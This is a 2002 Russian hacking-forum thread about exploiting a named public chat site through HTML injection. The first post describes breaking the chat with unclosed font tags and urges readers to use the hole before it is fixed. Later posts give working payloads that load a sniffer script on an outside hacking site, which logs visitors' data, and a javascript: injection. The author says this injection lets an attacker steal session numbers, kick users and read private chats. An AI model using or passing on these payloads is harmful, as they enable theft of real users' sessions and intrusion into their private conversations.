ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.10.2002, 00:20
Аватар для 50r
50r
Новичок
Регистрация: 17.10.2002
Сообщений: 8
Провел на форуме:
0

Репутация: 1
По умолчанию

www.gaychat.ru - заходите. регистрируетесь. входите в чат. и пишите что то типа

текст <font face=webdings> <font/><font/><font/><font/>

*<font/> - столько сколько хватит строки ввода.

эффект получается за счет не закрытого тэга фонта.. это надо видеть) оччень эффектно!) когда все последующие сообщения после вашего идут не слова и картинки) стоит повторить несколько раз подряд для достижения лучшего результата. и немного изменяйте фразу а то софт не пропускает одинаковые сообщения несколько раз подряд.

еще так же можно хделать тэги курсива и жирного шрифта.
в других чатах не пробовал... можно получится.

Юзайте пока дырку не прикрыли)



 
Ответить с цитированием

  #2  
Старый 17.10.2002, 12:47
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

Нда... любопытный чатик....
Но ломается он намного круче чем просто глюки с фонтом..
Например его можно сниферить:
В два этапа , сначала посылем такое сообщение:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;a href=&quot;http://dsds.ds/?&quot;a=`&gt;input fdfs&lt;/a&gt;[/QUOTE]<span id='postcolor'>
И сразу же за ним еще одно:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(http://www.hackzone.ru/cgi-bin/sniff.cgi?Algol)` [/QUOTE]<span id='postcolor'>
(сообщения нужно посылать именно такие, &quot;лишние&quot; пробелы не удалять &#33

Результат как говорится на лице ....
(вернее в логе хакзоны, а для тех кто в танке: лог хак зоны http://www.hackzone.ru/files/snifflog.txt)
 
Ответить с цитированием

  #3  
Старый 17.10.2002, 21:43
Аватар для 50r
50r
Новичок
Регистрация: 17.10.2002
Сообщений: 8
Провел на форуме:
0

Репутация: 1
По умолчанию

гмм... оригинално!:))
ну если как бэк можно вставить любой? урл, тооо... получается можно и скрипт какой то вставить или нет?
оччень очень интересная идЭя... :)
 
Ответить с цитированием

  #4  
Старый 18.10.2002, 11:30
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

ты видимо не читал мои статьи, поэтому тебе кажется это оригинальным...
На самом деле это старая технология , приспособленная к особенностям данного чата.
А насчет скриптов - как ты правильно понял если можно вставить снифер, то можно вставить и скрипт, и узнать номера сессий, и кикнуть , и залезть в приват.. В общем по полной программе....
Для вставки скрипта вместо второго сообщения можно послать например :
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">` fe fd style = `background :url(javascript:alert())` [/QUOTE]<span id='postcolor'>

Только советую эксперементирвать в привате , дабы не шокировать публику ...
 
Ответить с цитированием

  #5  
Старый 01.11.2002, 01:09
Аватар для 50r
50r
Новичок
Регистрация: 17.10.2002
Сообщений: 8
Провел на форуме:
0

Репутация: 1
По умолчанию

а можно через скрипт менять размер шрифта? иль картинку вставлять?
 
Ответить с цитированием

  #6  
Старый 17.10.2003, 16:19
Аватар для
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

ПРИВЕТ ВСЕМ
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ